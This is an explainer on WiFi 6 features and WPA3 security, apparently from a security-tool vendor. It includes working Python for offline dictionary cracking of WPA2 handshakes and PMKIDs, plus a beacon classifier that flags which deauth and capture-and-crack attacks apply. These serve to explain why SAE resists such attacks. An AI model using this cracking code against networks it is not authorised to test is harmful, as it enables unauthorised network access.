WiFi 6 (802.11ax) Explained

Efficiency Over Raw Speed

Every WiFi generation before 802.11ax (WiFi 6) focused primarily on peak throughput. Faster modulation, wider channels, more spatial streams - all aimed at pushing the maximum data rate higher. WiFi 6 shifted the priority. Its theoretical maximum of 9.6 Gbps is only about 39% above WiFi 5's 6.9 Gbps. The real improvements are in how WiFi 6 handles many devices on the same network.

The problem WiFi 6 solves is density. A stadium with 50,000 people, an office with 200 devices per floor, a home with 30 IoT gadgets - these environments break older WiFi. Not because the access point lacks bandwidth, but because the protocol wastes airtime with inefficient scheduling. Apart from downlink MU-MIMO in WiFi 5 Wave 2, a WiFi 5 access point gives the entire channel to one device at a time. With dozens of devices competing for airtime, each one waits longer and longer for its turn.

WiFi 6 introduces mechanisms that let the access point serve multiple devices in a single transmission, schedule device activity to reduce contention, and manage interference between neighboring networks. The result is better performance for every device, not just the one closest to the access point.

OFDMA - Sharing the Channel

OFDMA (Orthogonal Frequency Division Multiple Access) is the most important technology in WiFi 6. It allows the access point to divide a channel into smaller frequency allocations called Resource Units (RUs) and assign different RUs to different clients in the same transmission.

In WiFi 5, a 20 MHz channel is one block. The access point transmits to one client, waits for an acknowledgment, then transmits to the next. With OFDMA, the same 20 MHz channel is divided into up to nine 26-tone RUs (larger 52-, 106- and 242-tone RUs can be used instead). The access point assigns each RU to a different client and transmits to all of them in a single PPDU: one preamble, one transmit opportunity, one acknowledgment exchange.

This matters most for small packets. IoT devices sending temperature readings, voice-over-WiFi frames, web browsing ACKs - these are all tiny transmissions for which the fixed per-transmission overhead (preamble, inter-frame spacing, acknowledgment, contention backoff) dwarfs the payload. A client's data rate inside an RU scales down with the RU size, so OFDMA does not move more bits per symbol; its gain comes from paying that fixed overhead once for many clients instead of once per client. Packing many small transmissions into one channel use dramatically improves efficiency.

OFDMA works on both downlink (access point to clients) and uplink (clients to access point). Uplink OFDMA uses trigger frames - the access point tells each client which RU, MCS and transmit power to use and when to transmit, coordinating their uplink transmissions so they do not collide.

graph TD
    subgraph "WiFi 5 - OFDM - One Client at a Time"
        A1["Time Slot 1: Client A gets full channel"] --> A2["Time Slot 2: Client B gets full channel"]
        A2 --> A3["Time Slot 3: Client C gets full channel"]
        A3 --> A4["Time Slot 4: Client D gets full channel"]
    end
    subgraph "WiFi 6 - OFDMA - Multiple Clients Simultaneously"
        B1["Single Time Slot"]
        B1 --> B2["RU 1: Client A"]
        B1 --> B3["RU 2: Client B"]
        B1 --> B4["RU 3: Client C"]
        B1 --> B5["RU 4: Client D"]
    end
    subgraph "Result"
        C1["OFDM: 4 time slots needed"]
        C2["OFDMA: 1 time slot needed"]
    end

OFDMA serves four clients in one time slot where OFDM needs four separate slots
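To put numbers on the efficiency argument, here is an added airtime model (not code from the original post) that compares four serial WiFi 5 style PPDUs with one OFDMA PPDU on a 20 MHz channel. The data-subcarrier counts per RU (24, 48, 102, 234), the RU tree and the 12.8 + 0.8 µs symbol timing are 802.11ax values; the 100 µs per-PPDU overhead and the client payload sizes are assumptions chosen for the example. The model also shows why the scheduler's RU split matters: one PPDU lasts as long as its slowest RU, so a bulk client in a small RU drags the small clients along with it.

```python
"""Airtime model: serial OFDM PPDUs (WiFi 5 style) versus one OFDMA PPDU
(WiFi 6 style) on a 20 MHz channel.

Data-subcarrier counts per RU, the RU tree and the symbol timing are 802.11ax
values. PPDU_OVERHEAD_US is an assumed round figure for preamble, SIFS,
acknowledgement, DIFS and mean backoff; it is not from the standard."""
from math import ceil

DATA_SUBCARRIERS = {26: 24, 52: 48, 106: 102, 242: 234}   # 20 MHz channel
SYMBOL_US = 12.8 + 0.8                                    # HE symbol + 0.8 us GI
PPDU_OVERHEAD_US = 100.0                                  # assumption, see above
MCS = {7: (6, 5 / 6), 9: (8, 5 / 6), 11: (10, 5 / 6)}     # bits/subcarrier, code rate


def bits_per_symbol(ru_tones, mcs, streams=1):
    """Data bits carried by one OFDM symbol in an RU of ru_tones tones."""
    bits, rate = MCS[mcs]
    return round(DATA_SUBCARRIERS[ru_tones] * bits * rate * streams)


def data_symbols(payload_bytes, ru_tones, mcs):
    """Symbols needed for a payload; the last symbol is padded, hence ceil."""
    return ceil(payload_bytes * 8 / bits_per_symbol(ru_tones, mcs))


def valid_20mhz_layout(rus):
    """True if the multiset of RU sizes fits the 20 MHz RU tree: one 242, or
    two 106-tone halves (each splittable into 52s and 26s) plus a centre 26."""
    n242, n106, n52, n26 = (rus.count(s) for s in (242, 106, 52, 26))
    if n242:
        return n242 == 1 and len(rus) == 1
    if n106 > 2 or n52 + 2 * n106 > 4:
        return False
    return n26 <= 9 - 2 * n52 - 4 * n106


def ofdm_airtime_us(payloads, mcs):
    """Each client gets the whole channel in its own PPDU, one after another."""
    return sum(PPDU_OVERHEAD_US + data_symbols(p, 242, mcs) * SYMBOL_US
               for p in payloads)


def ofdma_airtime_us(assignments, mcs):
    """One PPDU; assignments is a list of (payload_bytes, ru_tones). The PPDU
    lasts as long as its slowest RU, so a bad RU split wastes the others."""
    rus = [ru for _, ru in assignments]
    if not valid_20mhz_layout(rus):
        raise ValueError("RU layout %r does not fit a 20 MHz channel" % rus)
    longest = max(data_symbols(p, ru, mcs) for p, ru in assignments)
    return PPDU_OVERHEAD_US + longest * SYMBOL_US


if __name__ == "__main__":
    small = [200, 200, 200, 200]      # four IoT-sized frames, in bytes (constructed)
    print("serial OFDM   :", ofdm_airtime_us(small, 11), "us")
    print("OFDMA 4 x RU52:", ofdma_airtime_us([(b, 52) for b in small], 11), "us")
    # One bulk client and three small ones: give the bulk client the big RU.
    print("OFDMA mixed   :", ofdma_airtime_us(
        [(1500, 106), (100, 26), (100, 26), (100, 26)], 11), "us")
```

At MCS 11 a 200-byte frame fits in one symbol of the full channel and in four symbols of a 52-tone RU, so the four clients need four data symbols either way; the roughly 3x airtime saving in the first comparison is entirely the shared overhead. In the mixed case, four equal RU52s cost 508 µs while 106 + 3 x 26 costs 304 µs, which is the scheduling decision the access point has to get right.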

TWT - Scheduled Sleep for IoT

Target Wake Time (TWT) lets the access point negotiate specific times for each client to wake up and transmit. Between those scheduled times, the client can enter deep sleep mode. This is transformative for battery-powered IoT devices.

Before TWT, a WiFi client had two options. It could stay awake all the time (high power consumption) or use legacy power save mode, which still requires waking for every DTIM beacon to check the traffic indication map, plus the overhead of PS-Poll frames to retrieve buffered data. Neither option was efficient enough for devices that need to run for months on a coin cell battery.

With TWT, a temperature sensor can negotiate to wake up once every 30 minutes, transmit its reading, and go back to sleep. The access point buffers any downlink data for that device and delivers it during the scheduled TWT window. Between windows, the device draws minimal current.

TWT also reduces contention. If 100 IoT devices on a network all negotiate different TWT schedules, they naturally spread their transmissions across time instead of all competing for the channel at once. This improves airtime efficiency even beyond what OFDMA provides.
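The wake schedule is carried in the TWT element a client and access point exchange during setup, and the interval is encoded as a 16-bit mantissa times a power of two, so a "30 minute" schedule is really the nearest representable value. The encoder and parser below are an added example (not code from the original post or from any vendor firmware); the field layout is the individual TWT parameter set of the 802.11ax TWT element (ID 216), the Control byte is left zero, and the 256 µs unit for the minimum wake duration is assumed.

```python
"""Encode and decode the individual TWT parameter set of an 802.11ax TWT element
(element ID 216), and pick the mantissa/exponent pair nearest a wanted interval.
Field layout follows 802.11ax; the 256 us wake-duration unit and a zero Control
byte are assumptions of this example."""
import struct

TWT_ELEMENT_ID = 216
SETUP_COMMANDS = {0: "Request", 1: "Suggest", 2: "Demand", 3: "Grouping",
                  4: "Accept", 5: "Alternate", 6: "Dictate", 7: "Reject"}
WAKE_DURATION_UNIT_US = 256


def choose_wake_interval(interval_us):
    """Return (mantissa, exponent) with interval ~= mantissa * 2**exponent,
    mantissa in 16 bits and exponent in 5 bits, using the smallest exponent
    that fits so quantisation error stays minimal."""
    for exponent in range(32):
        mantissa = round(interval_us / 2 ** exponent)
        if mantissa <= 0xFFFF:
            return mantissa, exponent
    raise ValueError("wake interval too large for the TWT element")


def build_twt_element(target_wake_time_us, interval_us, min_wake_duration_us,
                      setup_command=1, request=True, trigger=False,
                      implicit=True, unannounced=True, flow_id=0):
    """Build the element a client would send in a TWT Setup request."""
    mantissa, exponent = choose_wake_interval(interval_us)
    request_type = (int(request)                 # B0  TWT Request
                    | (setup_command & 0x7) << 1  # B1-B3 TWT Setup Command
                    | int(trigger) << 4           # B4  Trigger
                    | int(implicit) << 5          # B5  Implicit
                    | int(unannounced) << 6       # B6  Flow Type (1 = unannounced)
                    | (flow_id & 0x7) << 7        # B7-B9 TWT Flow Identifier
                    | (exponent & 0x1F) << 10)    # B10-B14 Wake Interval Exponent
    control = 0                                   # assumption: no NDP paging etc.
    body = struct.pack("<HQBHB", request_type, target_wake_time_us,
                       min_wake_duration_us // WAKE_DURATION_UNIT_US, mantissa, 0)
    return bytes([TWT_ELEMENT_ID, 1 + len(body), control]) + body


def parse_twt_element(ie):
    """Decode the element back into the schedule the device will actually follow."""
    if len(ie) < 17 or ie[0] != TWT_ELEMENT_ID or ie[1] != len(ie) - 2:
        raise ValueError("not a well-formed TWT element")
    req, twt, duration, mantissa, channel = struct.unpack("<HQBHB", ie[3:17])
    exponent = (req >> 10) & 0x1F
    return {
        "request": bool(req & 1),
        "setup_command": SETUP_COMMANDS[(req >> 1) & 0x7],
        "trigger": bool(req & 1 << 4),
        "implicit": bool(req & 1 << 5),
        "unannounced": bool(req & 1 << 6),
        "flow_id": (req >> 7) & 0x7,
        "target_wake_time_us": twt,
        "wake_interval_us": mantissa << exponent,
        "min_wake_duration_us": duration * WAKE_DURATION_UNIT_US,
        "channel": channel,
    }


if __name__ == "__main__":
    # Constructed sensor schedule: first wake at TSF 123456789, then every 30 min.
    ie = build_twt_element(123456789, 30 * 60 * 1_000_000, 20_000)
    print(ie.hex())
    print(parse_twt_element(ie))
```

The round trip shows the quantisation: 30 minutes becomes mantissa 54932 with exponent 15, i.e. 1,800,011,776 µs, and a 20 ms requested wake duration is truncated to 78 units of 256 µs (19,968 µs). A device that assumes its schedule is exactly what it asked for will drift against the access point's buffering window.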

BSS Coloring - Reducing Interference

In dense WiFi environments - apartment buildings, office complexes, conference halls - multiple access points operate on the same channel. Before WiFi 6, a device hearing any frame on its channel above the clear-channel-assessment threshold would defer, even if the frame came from a neighboring network at a level that would not have corrupted the device's own transmission. Deferring to traffic you could safely talk over is the exposed node problem; the neighboring networks sharing a channel are called overlapping BSSs (OBSS).

BSS Coloring assigns a 6-bit color code to each BSS (Basic Service Set - essentially each access point's network). This color is carried in the HE-SIG-A field of every WiFi 6 frame's PHY preamble, so a receiver learns it before decoding any of the payload. When a device detects a frame, it checks the BSS color before deciding whether to defer.

If the frame has the same color (same BSS), the device defers as normal. If the frame has a different color (different BSS), the device can choose to transmit anyway if the received signal strength is below an OBSS-PD (preamble detection) threshold. The threshold is not free: a device that ignores a stronger neighbor must lower its own transmit power by the same margin, so it does not become the interferer for that neighbor. This spatial reuse lets nearby networks on the same channel operate more independently, increasing overall throughput in dense deployments.

graph LR
    subgraph "Without BSS Coloring"
        A1[AP 1 - Channel 6] -->|Frame| C1[Client]
        A2[AP 2 - Channel 6] -->|Frame| C1
        C1 -->|"Defers for BOTH APs"| D1[Wasted airtime]
    end
    subgraph "With BSS Coloring"
        B1["AP 1 - Channel 6 - Color 3"] -->|"Color 3 frame"| C2[Client of AP 1]
        B2["AP 2 - Channel 6 - Color 7"] -->|"Color 7 frame"| C2
        C2 -->|"Defers only for Color 3"| D2[Less wasted airtime]
        C2 -->|"Ignores Color 7 if weak"| D3[Can transmit over it]
    end

BSS Coloring lets devices ignore weak signals from other networks instead of deferring to all traffic
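The defer-or-transmit decision above, written out as an added example (not code from the original post or any chipset's firmware). The OBSS-PD constants are the 802.11ax defaults: OBSS_PDmin -82 dBm, OBSS_PDmax -62 dBm and a transmit power reference of 21 dBm, with the permitted threshold rising one dB for every dB the station backs off its own transmit power. Treating color 0 as "no color" and the colour-collision fallback are assumptions of the example.

```python
"""BSS Color / OBSS-PD spatial reuse decision for an 802.11ax station.

Threshold constants are the 802.11ax defaults (OBSS_PDmin -82 dBm,
OBSS_PDmax -62 dBm, TXPWRref 21 dBm). Everything else is an added
illustration of the rule, not vendor firmware logic."""

OBSS_PD_MIN_DBM = -82
OBSS_PD_MAX_DBM = -62
TX_PWR_REF_DBM = 21
CCA_HE_20MHZ_DBM = -82   # a 20 MHz HE preamble at or above this counts as "busy"


def obss_pd_level(tx_power_dbm):
    """Threshold below which an inter-BSS frame may be ignored.
    Backing off own transmit power buys a higher (more permissive) threshold:
    level = clamp(OBSS_PDmin + (TXPWRref - TXPWR), OBSS_PDmin, OBSS_PDmax)."""
    level = OBSS_PD_MIN_DBM + (TX_PWR_REF_DBM - tx_power_dbm)
    return max(OBSS_PD_MIN_DBM, min(OBSS_PD_MAX_DBM, level))


def max_tx_power_for_level(level_dbm):
    """Inverse: the most a station may transmit while ignoring frames below level_dbm."""
    return TX_PWR_REF_DBM - (level_dbm - OBSS_PD_MIN_DBM)


def cca_decision(own_color, frame_color, rssi_dbm, tx_power_dbm):
    """Return 'DEFER', 'TX' (idle by ordinary CCA) or 'TX_SPATIAL_REUSE'."""
    if rssi_dbm < CCA_HE_20MHZ_DBM:
        return "TX"                  # too weak to count as busy for anyone
    if frame_color == 0 or frame_color == own_color:
        return "DEFER"               # own BSS, or colour unknown: legacy behaviour
    if rssi_dbm < obss_pd_level(tx_power_dbm):
        return "TX_SPATIAL_REUSE"    # inter-BSS and weak enough to talk over
    return "DEFER"


def pick_free_color(colors_heard):
    """After a station reports a colour collision (same colour, different BSSID)
    the AP switches to a colour it has not heard on the channel.
    Assumption of this example: 0 is never chosen, it stands for 'no colour'."""
    for colour in range(1, 64):
        if colour not in colors_heard:
            return colour
    raise RuntimeError("all 63 colours in use")


if __name__ == "__main__":
    for tx in (21, 11, 1):
        print("tx %3d dBm -> may ignore OBSS frames below %d dBm" % (tx, obss_pd_level(tx)))
    # Constructed scenario: our colour 3, neighbour AP colour 7 heard at -75 dBm.
    print("full power :", cca_decision(3, 7, -75, 21))
    print("backed off :", cca_decision(3, 7, -75, 11))
    print("own BSS    :", cca_decision(3, 3, -75, 11))
```

The second and third prints are the whole trade-off: the same -75 dBm neighbor is deferred to at 21 dBm but talked over at 11 dBm, and a frame of our own color is always deferred to regardless of power.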

1024-QAM and Other Improvements

1024-QAM: WiFi 5 used 256-QAM, encoding 8 bits per symbol. WiFi 6 moves to 1024-QAM, encoding 10 bits per symbol - a 25% increase in data per symbol. The catch: 1024-QAM requires a very high signal-to-noise ratio, so it only works at short range with a strong, clean signal. At medium to long range, rate adaptation automatically drops to lower modulations.

Uplink MU-MIMO: WiFi 5's MU-MIMO was downlink only. WiFi 6 adds uplink MU-MIMO, allowing multiple clients to transmit to the access point simultaneously. Combined with OFDMA, this significantly improves uplink efficiency in multi-device environments.

Longer OFDM symbols: WiFi 6 uses a 12.8-microsecond OFDM symbol (four times WiFi 5's 3.2 microseconds) with guard intervals of 0.8, 1.6 or 3.2 microseconds instead of 0.4 or 0.8. The longer symbol comes from narrower subcarrier spacing (78.125 kHz instead of 312.5 kHz), which is also what makes 26-tone RUs practical; the longer guard interval makes transmissions more robust against multipath delay spread in outdoor and large indoor environments.

Dual-band return: WiFi 6 operates on both 2.4 GHz and 5 GHz, unlike WiFi 5's 5 GHz-only approach. WiFi 6 on 2.4 GHz brings OFDMA, TWT, and BSS Coloring to the crowded 2.4 GHz band, which benefits IoT devices that rely on 2.4 GHz for range.

WPA3 - Mandatory for WiFi 6

The Wi-Fi Alliance requires WPA3 support for WiFi 6 certification. This is the most significant security change since WPA2 replaced WPA in 2004.

WPA3-Personal replaces the Pre-Shared Key (PSK) handshake with SAE (Simultaneous Authentication of Equals), a password-authenticated key exchange (PAKE) based on the Dragonfly protocol. The critical improvement: the resulting PMK is no longer a deterministic function of the passphrase and SSID, so even an attacker who captures the entire authentication exchange cannot test passphrase guesses offline. Each guess requires a live exchange with the access point, which can rate-limit failed attempts, making brute force impractical. SAE also provides forward secrecy: a recorded session cannot be decrypted even if the passphrase leaks later.

WPA3 also mandates Protected Management Frames (PMF, 802.11w), which integrity-protects management frames such as deauthentication and disassociation (unicast ones are encrypted as well). This directly impacts deauthentication attacks - a core technique in WiFi security testing. With PMF negotiated, a forged deauthentication frame fails the integrity check and is dropped.

Important nuance: WPA3 certification requires support, not exclusive use. Many WiFi 6 routers ship in "WPA2/WPA3 transition mode" that accepts both protocols. In transition mode, WPA2 clients can still connect using PSK, PMF is only advertised as capable rather than required, and deauthentication attacks may still work against those WPA2 clients. Only when the network is configured for WPA3-only mode (SAE only, PMF required) are the full security benefits enforced.
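The mode an access point is actually running is visible in the RSN element of its beacons, so the first check in an assessment is to decode it rather than trust the router's label. The parser and classifier below are an added example (not code from the original post or from the BLEShark Nano firmware); suite selectors (00-0F-AC:2 PSK, :8 SAE and so on) and the MFPC/MFPR capability bits follow IEEE 802.11, and the three beacon elements it classifies are constructed in-code.

```python
"""Decode the RSN element (ID 48) from a beacon or probe response and classify
the network as WPA3-only, WPA2/WPA3 transition or WPA2-only, with PMF status.
Suite selectors and capability bits follow IEEE 802.11; the elements built in
__main__ are constructed for this example, not captured from a real network."""
import struct

RSN_ELEMENT_ID = 48
OUI = b"\x00\x0f\xac"
AKM = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK", 5: "802.1X-SHA256",
       6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE", 12: "802.1X-SuiteB-192", 18: "OWE"}
CIPHER = {2: "TKIP", 4: "CCMP-128", 6: "BIP-CMAC-128", 8: "GCMP-128",
          9: "GCMP-256", 10: "CCMP-256"}
MFPR = 1 << 6   # RSN Capabilities: Management Frame Protection Required
MFPC = 1 << 7   # RSN Capabilities: Management Frame Protection Capable


def build_rsn_ie(akms, mfpc, mfpr, pairwise=("CCMP-128",), group="CCMP-128"):
    """Construct an RSN element the way an AP advertises it (used for test input)."""
    akm_id = {v: k for k, v in AKM.items()}
    cipher_id = {v: k for k, v in CIPHER.items()}
    body = struct.pack("<H", 1) + OUI + bytes([cipher_id[group]])
    body += struct.pack("<H", len(pairwise))
    body += b"".join(OUI + bytes([cipher_id[c]]) for c in pairwise)
    body += struct.pack("<H", len(akms))
    body += b"".join(OUI + bytes([akm_id[a]]) for a in akms)
    body += struct.pack("<H", (MFPC if mfpc else 0) | (MFPR if mfpr else 0))
    return bytes([RSN_ELEMENT_ID, len(body)]) + body


def parse_rsn_ie(ie):
    """Walk the element: version, group cipher, pairwise list, AKM list, capabilities."""
    if len(ie) < 2 or ie[0] != RSN_ELEMENT_ID or ie[1] != len(ie) - 2:
        raise ValueError("not a well-formed RSN element")
    pos = 2
    version, = struct.unpack_from("<H", ie, pos)
    pos += 2
    if version != 1:
        raise ValueError("unsupported RSN version %d" % version)

    def suite(table):
        nonlocal pos
        oui, typ = ie[pos:pos + 3], ie[pos + 3]
        pos += 4
        if oui != OUI:
            return "vendor:%s:%d" % (oui.hex(), typ)
        return table.get(typ, "unknown:%d" % typ)

    def suite_list(table):
        nonlocal pos
        count, = struct.unpack_from("<H", ie, pos)
        pos += 2
        return [suite(table) for _ in range(count)]

    group = suite(CIPHER)
    pairwise = suite_list(CIPHER)
    akms = suite_list(AKM)
    caps = struct.unpack_from("<H", ie, pos)[0] if pos + 2 <= len(ie) else 0
    return {"group": group, "pairwise": pairwise, "akm": akms,
            "mfpc": bool(caps & MFPC), "mfpr": bool(caps & MFPR)}


def classify(ie):
    """Turn the decoded element into the practitioner's answer: which mode, and
    which attacks from the text still apply."""
    r = parse_rsn_ie(ie)
    sae = any(a in ("SAE", "FT-SAE") for a in r["akm"])
    psk = any(a in ("PSK", "FT-PSK", "PSK-SHA256") for a in r["akm"])
    warnings = []
    if sae and psk:
        mode = "WPA2/WPA3 transition"
        warnings.append("PSK AKM offered: WPA2 joins remain capture-and-crack targets")
        if not r["mfpr"]:
            warnings.append("MFPR clear: WPA2 clients may associate without PMF, forged deauth works on them")
    elif sae:
        mode = "WPA3-only"
        if not r["mfpr"]:
            warnings.append("WPA3-only but MFPR clear: non-compliant configuration")
    elif psk:
        mode = "WPA2-only"
        warnings.append("PSK only: offline dictionary attack applies" +
                        ("" if r["mfpr"] else "; forged deauth applies"))
    else:
        mode = "Enterprise/other (%s)" % ", ".join(r["akm"])
    if "TKIP" in r["pairwise"] or r["group"] == "TKIP":
        warnings.append("TKIP allowed")
    return {"mode": mode, "akm": r["akm"], "mfpc": r["mfpc"], "mfpr": r["mfpr"],
            "warnings": warnings}


if __name__ == "__main__":
    for label, ie in (("WPA3-only AP", build_rsn_ie(["SAE"], True, True)),
                      ("transition AP", build_rsn_ie(["PSK", "SAE"], True, False)),
                      ("WPA2 AP", build_rsn_ie(["PSK"], False, False))):
        print(label, "->", classify(ie))
```

In a real assessment the element comes from the Information Elements of a captured beacon; the relevant bit of the decision is the AKM list plus MFPR, which is exactly what a router's "WPA3" label hides when it is really transition mode.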

flowchart TD
    subgraph "WPA2 vs WPA3 - Attack Impact"
        A[Attacker captures authentication] --> B{Protocol?}
        B -->|WPA2 PSK| C[Offline dictionary attack]
        C --> D["hashcat: millions of PBKDF2 guesses/second per GPU"]
        D --> E["Weak passwords cracked in minutes"]
        B -->|WPA3 SAE| F[No offline attack possible]
        F --> G["Each guess requires network interaction"]
        G --> H["Rate-limited by access point"]
    end
    subgraph "Deauthentication"
        I[Forged deauth frame] --> J{PMF enabled?}
        J -->|No - WPA2| K[Client disconnects]
        J -->|Yes - PMF negotiated| L[Frame rejected]
    end

WPA3 eliminates offline dictionary attacks and protected management frames block forged deauthentication

What Changes for Security Research

WiFi 6 with WPA3 changes the security research playbook in several important ways.

Handshake capture becomes less useful: On WPA3-only networks, capturing the authentication exchange does not enable offline cracking. The PMKID attack and 4-way handshake capture techniques that work against WPA2 are ineffective against WPA3-SAE, because both rely on the PMK being derived directly from the passphrase. Researchers testing WPA3 networks need different approaches - the Dragonblood work of 2019 (timing and cache side channels against SAE's password element derivation, plus downgrade attacks on transition mode, since largely patched) or implementation flaws rather than protocol weaknesses.
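Why the WPA2 techniques work, and why they have nothing to grip on under SAE, is clearest in code. The following is an added example (not code from the original post or from the BLEShark Nano) of the published WPA2 key schedule: PBKDF2(passphrase, SSID) gives the PMK, the 802.11 PRF expands it to a PTK whose first 16 bytes (the KCK) sign EAPOL-Key frames, and the PMKID is HMAC-SHA1 of the same PMK over the two MAC addresses. Every one of those steps is a deterministic function of the passphrase, so a captured handshake or PMKID can be tested against a wordlist offline. The "capture" here is constructed in-code from a known passphrase (constructed MAC addresses and nonces) so the example runs without a radio. Under SAE the PMK comes out of the Dragonfly exchange, so there is no equivalent function to evaluate.

```python
"""Offline dictionary attack on a WPA2 4-way handshake and on a PMKID,
using the published WPA2 key schedule. The capture is constructed in-code
from a known passphrase so the example runs offline (constructed data,
not a real network)."""
import hashlib
import hmac
import struct


def wpa2_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def wpa2_kck(pmk, aa, spa, anonce, snonce):
    """Key Confirmation Key: first 16 bytes of the PTK (PRF-384 for CCMP)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck, eapol_with_mic_zeroed):
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 16 bytes."""
    return hmac.new(kck, eapol_with_mic_zeroed, hashlib.sha1).digest()[:16]


def pmkid(pmk, aa, spa):
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA), sent by the AP in message 1."""
    return hmac.new(pmk, b"PMK Name" + aa + spa, hashlib.sha1).digest()[:16]


def constructed_capture(passphrase, ssid):
    """What a sniffer would have recorded for this passphrase (constructed)."""
    aa = bytes.fromhex("02000000aa01")      # AP MAC, constructed
    spa = bytes.fromhex("02000000cc02")     # client MAC, constructed
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))   # constructed nonces
    pmk = wpa2_pmk(passphrase, ssid)
    # Minimal EAPOL-Key message 2 with the MIC field already zeroed: descriptor
    # type 2, key info 0x010a (pairwise, MIC, version 2), key length 16,
    # replay counter 1, SNonce, IV, RSC, ID, MIC, key data length 0.
    body = (b"\x02" + struct.pack(">HHQ", 0x010A, 16, 1) + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    eapol = struct.pack(">BBH", 1, 3, len(body)) + body
    mic = eapol_mic(wpa2_kck(pmk, aa, spa, anonce, snonce), eapol)
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": mic, "pmkid": pmkid(pmk, aa, spa)}


def crack_handshake(cap, wordlist):
    """Recompute the MIC for every candidate; no interaction with the AP needed."""
    for cand in wordlist:
        pmk = wpa2_pmk(cand, cap["ssid"])
        kck = wpa2_kck(pmk, cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])
        if hmac.compare_digest(eapol_mic(kck, cap["eapol"]), cap["mic"]):
            return cand
    return None


def crack_pmkid(cap, wordlist):
    """Same idea with less to capture: only message 1 and the two MACs."""
    for cand in wordlist:
        guess = pmkid(wpa2_pmk(cand, cap["ssid"]), cap["aa"], cap["spa"])
        if hmac.compare_digest(guess, cap["pmkid"]):
            return cand
    return None


if __name__ == "__main__":
    cap = constructed_capture("correct horse", "LabNet")
    words = ["password", "letmein", "correct horse", "hunter2"]   # constructed wordlist
    print("handshake:", crack_handshake(cap, words))
    print("pmkid    :", crack_pmkid(cap, words))
```

The cost per guess is one PBKDF2 with 4096 HMAC-SHA1 rounds, which is what limits hashcat to millions rather than billions of WPA2 guesses per second; the point of SAE is that this loop cannot be written at all, not that the loop is slower.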

Deauthentication testing requires nuance: PMF blocks forged deauthentication in WPA3 mode. In transition mode (WPA2/WPA3), deauthentication may still work against WPA2 clients. Testing deauth resilience now requires identifying which clients use WPA3 vs WPA2 and testing each separately.

2.4 GHz remains relevant: WiFi 6 on 2.4 GHz means the BLEShark Nano can detect WiFi 6 access points broadcasting on 2.4 GHz. The scanner will show the SSID, channel, and encryption type. WiFi 6 access points do advertise themselves in beacons (through the HE Capabilities and HE Operation elements), but a basic scanner that only reads SSID, channel and the RSN element will not decode them, and features like OFDMA and TWT are invisible in any case because they affect how traffic is scheduled, not what the beacon says.

IoT testing grows: TWT-enabled IoT devices on WiFi 6 have different behavior patterns than always-on devices. They are only reachable during their TWT windows, which creates new testing challenges for device security assessments. You cannot scan a sleeping device.

WiFi 6 does not make all existing tools obsolete. The BLEShark Nano's WiFi scanner, deauthentication testing, and handshake capture all remain functional against the vast majority of networks running WPA2 on 2.4 GHz. But as WPA3 adoption increases, the effectiveness of traditional capture-and-crack techniques will decline. Smart researchers are already adapting their methodologies.
